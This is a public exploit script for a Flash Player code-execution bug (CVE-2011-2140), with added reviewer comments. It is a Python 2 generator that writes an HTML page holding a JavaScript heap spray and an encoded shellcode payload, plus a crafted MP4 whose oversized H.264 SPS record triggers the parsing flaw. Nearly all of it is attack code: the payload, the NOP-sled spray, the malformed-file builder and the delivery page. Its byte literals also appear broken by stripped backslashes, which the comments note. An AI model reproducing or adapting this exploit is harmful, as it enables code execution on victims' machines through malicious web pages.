
Adobe Flash Player Code Execution

Posted on 01 February 2012

# Abysssec Public Exploit
# CVE-2011-2140
# This exploit tested on Adobe Flash Player <= 10.3.181.34 ( XP sp3 )
# twitter : @abysssec
# contact : info [at] abysssec.com
# http://www.abysssec.com/blog/2012/01/31/exploiting-cve-2011-2140-another-flash-player-vulnerability
#
#
# Reviewer notes (defensive reading of this listing):
#   - This script is a file generator only: main() writes exploit.html (a page
#     that runs a JavaScript heap spray and embeds a Flash media player) and
#     exploit.mp4 (a crafted H.264/MP4 container). The mediaplayer.swf and
#     video.jpg the HTML refers to are not produced here.
#   - Every "byte" literal below reads as x00x00... instead of \x00\x00...;
#     the backslashes appear to have been stripped when the listing was
#     published, so as written these are plain ASCII text and the generated
#     .mp4 is not the binary box structure the comments describe. Left as-is.
#   - Python 2 syntax (print statements); it does not run under Python 3.
#   - Mitigation: the header scopes the bug to Flash Player <= 10.3.181.34 and
#     the plugin has since been retired; removing or blocking Flash is the
#     effective control. Detection notes on the crafted MP4 are in createMP4().
import sys


def spray_heap():
    """Return the JavaScript source of the heap-spray routine placed in exploit.html.

    The Python side does no work; it only returns the string. The JavaScript is
    the textbook spray shape that browser and IDS heuristics key on:
    ``payload`` is a %u-escaped blob (presumably shellcode), ``spray`` is a
    0x9090 (x86 NOP) sled doubled until it is at least 0xA0000 characters long,
    and 100 copies of sled + payload are kept alive in the global ``memory``
    array so the heap is carpeted with predictable content.
    """
    spray = ''' function spray_heap() { var payload = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580"); var spray = unescape("%u9090%u9090"); do { spray += spray; } while(spray.length < 0xA0000); memory = new Array(); for(i = 0; i < 100; i++) memory[i] = spray + payload; } '''
    return spray


def createMP4():
    """Return the contents of the crafted exploit.mp4 as one string.

    The file is assembled as ftyp + mdat + moov, where moov is built from three
    pieces: ``moovAtom1`` (mvhd, trak/tkhd, mdia/mdhd/hdlr, minf/vmhd/dinf/dref,
    stbl/stsd/avc1 and the start of the avcC record), ``SPSUnit`` (the H.264
    sequence parameter set carried inside avcC) and ``moovAtom2`` (stts, stss,
    ctts, stsc, stsz, stco). The FourCC names below are decoded from the ASCII
    bytes in the literals.

    Defensive observations a file scanner or hardened parser can act on:
      * the declared box sizes do not nest consistently -- stbl claims 0x9DD
        bytes inside a minf of 0x21D inside a moov of 0x883 -- so a strict
        size check rejects the file before any codec data is touched;
      * the SPS length prefix is 0x081A (2074 bytes), far above what a real
        SPS needs, and the SPS body is a long repeating byte pattern; the
        oversized SPS is presumably the element that triggers the parsing
        bug referenced in the header.
    """
    mp4 = ""  # unused: reassigned at the bottom of the function
    # "ftyp" (0x20 bytes): major brand "isom", compatible brands isom/iso2/avc1/mp41
    ftypAtom = "x00x00x00x20x66x74x79x70x69x73x6Fx6Dx00x00x02x00x69x73x6Fx6Dx69x73x6Fx32x61x76x63x31x6Dx70x34x31"
    # "mdat" (0x10 bytes): only 8 bytes of sample data; the file is all metadata
    mdatAtom = "x00x00x00x10x6Dx64x61x74x00x00x02x8Bx06x05xFFxFF"
    # "moov" (declared 0x883) / "mvhd" (0x6C)
    moovAtom1 = "x00x00x08x83x6Dx6Fx6Fx76x00x00x00x6Cx6Dx76x68x64x00x00x00x00x7Cx25xB0x80x7Cx25xB0x80x00"
    moovAtom1 +="x00x03xE8x00x00x2Fx80x00x01x00x00x01x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00"
    moovAtom1 +="x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x40"
    moovAtom1 +="x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
    # "trak" (0x2FA) / "tkhd" (0x5C)
    moovAtom1 +="x00x00x03x00x00x02xFAx74x72x61x6Bx00x00x00x5Cx74x6Bx68x64x00x00x00x0Fx7Cx25xB0x80x7C"
    moovAtom1 +="x25xB0x80x00x00x00x01x00x00x00x00x00x00x2ExE0x00x00x00x00x00x00x00x00x00x00x00x00x00"
    moovAtom1 +="x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00"
    # "mdia" (0x272)
    moovAtom1 +="x00x00x00x00x00x00x00x40x00x00x00x01x42x00x00x01x42x00x00x00x00x02x72x6Dx64x69x61x00"
    # "mdhd" (0x20)
    moovAtom1 +="x00x00x20x6Dx64x68x64x00x00x00x00x7Cx25xB0x80x7Cx25xB0x80x00x00x00x01x00x00x00x0Cx55"
    # "hdlr" (0x2D): handler type "vide", name "VideoHandler"
    moovAtom1 +="xC4x00x00x00x00x00x2Dx68x64x6Cx72x00x00x00x00x00x00x00x00x76x69x64x65x00x00x00x00x00"
    # "minf" declared as 0x21D -- smaller than the stbl it must contain (see docstring)
    moovAtom1 +="x00x00x00x00x00x00x00x56x69x64x65x6Fx48x61x6Ex64x6Cx65x72x00x00x00x02x1Dx6Dx69x6Ex66"
    # "vmhd" (0x14) / "dinf" (0x24)
    moovAtom1 +="x00x00x00x14x76x6Dx68x64x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x24x64x69x6Ex66"
    # "dref" (0x1C) with one "url " entry (0x0C)
    moovAtom1 +="x00x00x00x1Cx64x72x65x66x00x00x00x00x00x00x00x01x00x00x00x0Cx75x72x6Cx20x00x00x00x01"
    # "stbl" (0x9DD) / "stsd" (0x899) with one sample entry
    moovAtom1 +="x00x00x09xDDx73x74x62x6Cx00x00x08x99x73x74x73x64x00x00x00x00x00x00x00x01x00x00x08x89"
    # "avc1" sample entry (0x889)
    moovAtom1 +="x61x76x63x31x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
    moovAtom1 +="x01x42x01x42x00x48x00x00x00x48x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00"
    moovAtom1 +="x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x18xFFxFFx00x00"
    # "avcC" (0x833): configurationVersion 1, AVCProfileIndication 0x64,
    # profile_compatibility 0, AVCLevelIndication 0x15, 0xFF (lengthSizeMinusOne),
    # 0xE1 = one SPS follows; SPSUnit is appended directly after this.
    moovAtom1 +="x08x33x61x76x63x43x01x64x00x15xFFxE1"
    # SPSUnit = SPSUnit Len (2 bytes) + NAL Header (1 byte) + profile_idc (1 byte) + Flags and Reserved (1 byte) + levelidc (1 byte) +
    # seq_parameter_set_id (variable) + log2_max_frame_num_minus4 (variable) + pic_order_cnt_type = 1 (variable) +
    # delta_pic_order_always_zero_flag (1 bit) + offset_for_non_ref_pic (num_ref_frames_in_pic_order_cnt_cycle) + offset_for_top_to_bottom_field (variable) +
    # num_ref_frames_in_pic_order_cnt_cycle (num_ref_frames_in_pic_order_cnt_cycle) + other bytes
    # Length prefix 0x081A (2074 bytes) is the anomalous value; the 0xFF run and
    # the repeating pattern that follows make up the bulk of the record.
    SPSUnit = "x08x1Ax67x70x34x32x74x70x00x00xAFx88x88x84x00x00x03x00x04x00x00x03x00x3FxFFxFFxFFxFFxFF"
    SPSUnit += "xFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFF"
    SPSUnit += "xFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFCx00x00x00x30x30x30x30x00x00x00x18"
    SPSUnit += "x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81"
    SPSUnit += "x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18"
    SPSUnit += "x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81"
    SPSUnit += "x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18"
    SPSUnit += "x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81"
    SPSUnit += "x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18"
    SPSUnit += "x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80"
    SPSUnit += "x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00"
    SPSUnit += "x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00"
    SPSUnit += "x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00x00"
    SPSUnit += "x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00x00"
    SPSUnit += "x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00x00x00"
    SPSUnit += "x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00x00x00"
    SPSUnit += "xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00x00x00x0C"
    SPSUnit += "x0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00x00x00xC0"
    SPSUnit += "xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00x00x00x0Cx0C"
    SPSUnit += "x0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00x00x00xC0xC0"
    SPSUnit += "xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0C"
    SPSUnit += "x0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00x00x00xC0xC0xC0"
    SPSUnit += "xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0C"
    SPSUnit += "x00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0"
    SPSUnit += "x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00"
    SPSUnit += "x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00"
    SPSUnit += "x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00"
    SPSUnit += "x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00"
    SPSUnit += "x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00"
    SPSUnit += "x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00"
    SPSUnit += "x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06"
    SPSUnit += "x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60"
    SPSUnit += "x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06"
    SPSUnit += "x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60"
    SPSUnit += "x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06"
    SPSUnit += "x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60"
    SPSUnit += "x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06"
    SPSUnit += "x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60"
    SPSUnit += "x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00"
    SPSUnit += "x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00"
    SPSUnit += "x00x00x30x30x30x30x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00"
    SPSUnit += "x00x03x03x03x03x00x00x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00"
    SPSUnit += "x00x30x30x30x30x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00"
    SPSUnit += "x03x03x03x03x00x00x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00"
    SPSUnit += "x30x30x30x30x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03"
    SPSUnit += "x03x03x03x00x00x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30"
    SPSUnit += "x30x30x30x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03"
    SPSUnit += "x03x03x00x00x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30"
    SPSUnit += "x30x30x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03"
    SPSUnit += "x03x00x00x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30"
    SPSUnit += "x30x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03"
    SPSUnit += "x00x00x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30"
    SPSUnit += "x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00"
    SPSUnit += "x00x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00"
    SPSUnit += "x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00"
    SPSUnit += "x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00"
    SPSUnit += "x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00"
    SPSUnit += "x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00"
    SPSUnit += "x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01"
    SPSUnit += "x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18"
    SPSUnit += "x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81"
    SPSUnit += "x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18"
    SPSUnit += "x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81"
    SPSUnit += "x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18"
    SPSUnit += "x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81"
    SPSUnit += "x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18"
    SPSUnit += "x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80"
    SPSUnit += "x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00"
    SPSUnit += "x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00"
    SPSUnit += "x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00x00"
    SPSUnit += "x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00x00"
    # final (short) fragment of the SPS record
    SPSUnit += "x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x03x03x03x03x00x00x00xB2x2C"
    # remaining sample tables: "stts" (0x18), "stss" (0x14), "ctts" (0x70)
    moovAtom2 = "x00x00x00x18x73x74x74x73x00x00x00x00x00x00x00x01x00x00x00x0Cx00x00x00x01x00x00x00x14x73"
    moovAtom2 += "x74x73x73x00x00x00x00x00x00x00x01x00x00x00x01x00x00x00x70x63x74x74x73x00x00x00x00x00x00"
    moovAtom2 += "x00x0Cx00x00x00x01x00x00x00x02x00x00x00x01x00x00x00x03x00x00x00x01x00x00x00x01x00x00x00"
    moovAtom2 += "x01x00x00x00x03x00x00x00x01x00x00x00x01x00x00x00x01x00x00x00x05x00x00x00x01x00x00x00x02"
    moovAtom2 += "x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00x01x00x00x00x01x00x00x00x03x00x00x00x01x00"
    # "stsc" (0x1C) / "stsz" (0x44)
    moovAtom2 += "x00x00x01x00x00x00x01x00x00x00x02x00x00x00x1Cx73x74x73x63x00x00x00x00x00x00x00x01x00x00"
    moovAtom2 += "x00x01x00x00x00x01x00x00x00x01x00x00x00x44x73x74x73x7Ax00x00x00x00x00x00x00x00x00x00x00"
    moovAtom2 += "x0Cx00x00x2Fx8Dx00x00x0CxFEx00x00x04x42x00x00x0Bx20x00x00x04x58x00x00x07x19x00x00x07x63"
    # "stco" (0x40): chunk offsets that point well past the 8-byte mdat actually written
    moovAtom2 += "x00x00x02xD6x00x00x03xC1x00x00x0AxDFx00x00x04x9Bx00x00x09x39x00x00x00x40x73x74x63x6Fx00"
    moovAtom2 += "x00x00x00x00x00x00x0Cx00x00x00x30x00x00x2FxBDx00x00x3Dx8Ax00x00x48x19x00x00x5AxF4x00x00"
    moovAtom2 += "x66x1Fx00x00x73xEAx00x00x82x32x00x00x8AxFAx00x00x95x51x00x00xA7x16x00x00xB1xE5"
    # the SPS record is spliced between the avcC header and the sample tables
    moovAtom = moovAtom1 + SPSUnit + moovAtom2
    mp4 = ftypAtom + mdatAtom + moovAtom
    return mp4


def main():
    """Write exploit.html and exploit.mp4 into the current directory.

    Both files are opened with 'wb+' (truncate, binary read/write); under
    Python 2 a str is written as-is. The HTML embeds the spray script, runs it
    from body onload, and loads mediaplayer.swf with file=exploit.mp4 so the
    player parses the crafted container. Any IOError aborts with exit code -1;
    the files are closed explicitly rather than via ``with``.
    """
    try:
        fHtml = open('exploit.html', 'wb+')
        contentHTML = '<html><script type="text/javascript">' + spray_heap() + '</script><body onload = "spray_heap()"><object width="320" height="204" type="application/x-shockwave-flash" data="mediaplayer.swf?autostart=true&image=video.jpg&file=exploit.mp4"><param name="movie" value="mediaplayer.swf?autostart=true&image=video.jpg&file=exploit.mp4"></object></body></html>'
        fHtml.write(contentHTML)
        fHtml.close()
        fMP4 = open('exploit.mp4', 'wb+')
        fMP4.write(createMP4())
        fMP4.close()
        print '[-] MP4 and Html files generated'
    except IOError:
        print '[*] Error : An IO error has occurred'
        print '[-] Exiting ...'
        sys.exit(-1)


if __name__ == '__main__':
    main()

 
